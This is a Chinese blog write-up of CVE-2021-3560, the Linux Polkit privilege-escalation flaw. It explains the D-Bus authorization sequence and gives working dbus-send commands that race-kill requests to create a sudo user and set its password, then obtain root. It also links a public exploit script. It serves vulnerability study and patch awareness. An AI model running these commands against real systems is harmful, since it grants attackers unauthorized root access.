• CVE-2021-3560 Linux Polkit 权限提升漏洞



    一、Polkit简介

    Polkit是默认安装在很多Linux发行版上的系统服务,它由systemd使用,因此任何使用systemd的Linux发行版也使用Polkit。

    CVE-2021-3560漏洞存在于系统服务Polkit中,同时因为Polkit被Systemd所调用,因此所有默认安装了systemd的Linux发行版都会使用Polkit。

    该漏洞的成因是执行dbus-send命令后在认证完成前强制终止引发错误。而Polkit未正确处理错误而导致允许无特权的用户添加一个sudo用户进行权限提升。

    下表展示的是一些流行的Linux发行版以及是否包含此漏洞的情况:
    在这里插入图片描述

    二、Polkit架构

    为了帮助解释该漏洞,首先对dbus-send命令执行过程进行说明。

    在这里插入图片描述
    虚线上方的两个进程dbus-send和Authentication Agent是非特权用户进程。线下的那些是特权系统进程。中间是dbus-daemon,它处理所有的通信:其他四个进程通过发送 D-Bus 消息相互通信。下面是通过dbus-send创建新用户的事件顺序:

    1、dbus-send要求accounts-daemon创建一个新用户。
    2、accounts-daemon从 接收 D-Bus 消息dbus-send。该消息包括发送者的  唯一总线名称。让我们假设它是:"1.96"。此名称附加到消息中,dbus-daemon不能伪造。
    3、accounts-daemon 询问 polkit 连接:1.96 是否被授权创建新用户。
    4、polkit 要求dbus-daemon提供连接的 UID:1.96。
    5、如果连接 :1.96 的 UID 为 "0",则 polkit 立即授权该请求。否则,它会向身份验证代理发送允许授权请求的管理员用户列表。
    6、身份验证代理打开一个对话框以从用户那里获取密码。
    7、身份验证代理将密码发送给 polkit。
    8、polkit 将"是"回复发送回accounts-daemon.
    9、accounts-daemon 创建新的用户帐户。
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9

    CVE-2021-3560漏洞位于上述事件序列的第四步。如果 polkit 向dbus-daemon请求总线:1.96 的 UID,但总线:1.96 不再存在,会发生什么?dbus-daemon正确处理这种情况并返回错误。但事实上 polkit 没有正确处理该错误,它没有拒绝请求,而是将请求视为来自 UID 0 的进程。换句话说,它立即授权请求。向dbus-demon请求总线UID的函数为polkit_system_bus_name_get_creds_sync。

    三、漏洞利用过程

    手工复现

    操作系统:Ubuntu 20.04
    镜像下载地址:点击下载

    该漏洞非常容易利用,它所需要的是仅使用标准工具,如在终端中的几个命令bash,kill和dbus-send。
    证明漏洞取决于安装的两个软件包:accountsservice和gnome-control-center 在 Ubuntu 桌面等图形系统上,这两个软件包通常默认安装。但是,如果您使用的是非图形 RHEL 服务器之类的东西,那么您可能需要安装它们,如下所示:

    sudo yum install accountsservice gnome-control-center
    
    • 1

    当然,该漏洞与accountsservice或gnome-control-center没有任何特别关系。它们只是 polkit 客户端,恰好是利用的方便载体。PoC 依赖gnome-control-center和accountsservice。

    为了避免重复触发身份验证对话框(这可能很烦人),我建议从 SSH 会话运行命令:
    ssh localhost
    在这里插入图片描述
    本地测试环境
    在这里插入图片描述
    该漏洞是通过启动dbus-send命令但在 polkit 仍在处理请求的过程中将其杀死而触发的。为了确定杀死dbus-send进程的时间,首先我们要测量dbus-send正常运行的时间:

    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hack string:"hack your host" int32:1
    
    • 1

    在这里插入图片描述
    可以看到大约在0.005s,所以就意味着我需要dbus-send在大约0.005s秒前终止命令。

    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hack string:"hack your host" int32:1 & sleep 0.003s ; kill $!
    
    • 1

    在这里插入图片描述
    这里可以多重复几次,就是为了可以写入成功!刷新几次之后 输入 id+用户 添加了一个名为hack的sudo用户。

    id的值为1004,将下面的payload参数进行修改

    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1004   org.freedesktop.Accounts.User.SetPassword string: 密码位 string:GoldenEye int32:1 & sleep 0.003s ; kill $!
    
    • 1

    在这之前需要使用openssl passwd -5 qwerasdf! 生成一个SSL密文(-5 指定sha256算法生成散列值)。
    在这里插入图片描述
    将该密文放在下面这段命令中的密码位里面
    在这里插入图片描述
    这里要反复刷几次,然后输入 su - hack
    在这里插入图片描述
    输入sudo su ->hack用户密码
    在这里插入图片描述
    漏洞利用成功!!!

    Exp脚本测试

    下载地址:https://github.com/Almorabea/Polkit-exploit
    在这里插入图片描述

    四、结论

    CVE-2021-3560 使无特权的本地攻击者能够获得 root 权限。它非常简单且易于利用,因此应该尽快更新 Linux 。任何安装了 polkit 0.113 版(或更高版本)的系统都容易受到攻击。这包括流行的发行版,例如 RHEL 8 和 Ubuntu 20.04。

  • 相关阅读:
    第十三届蓝桥杯JavaB组国赛E题——迷宫 (AC)
    netsh int ip 添加/删除 TCP 协议 excludedportrange 的方法
    使用pnpm创建vue3项目
    集成正态云和动态扰动的哈里斯鹰优化算法
    vue模板语法上集->插值,指令,过滤器,计算属性&监听属性,vue购物车
    BigDecimal使用
    模型部署入门教程(七):TensorRT 模型构建与推理
    mysql数据库基本操作中update修改、delete删除基本操作
    什么是平面文件数据库? 如何导入多种格式的文件:DSV、JSON、XML?
    Git创建仓库、并同步本地项目到远程
  • 原文地址:https://blog.csdn.net/weixin_46944519/article/details/127798214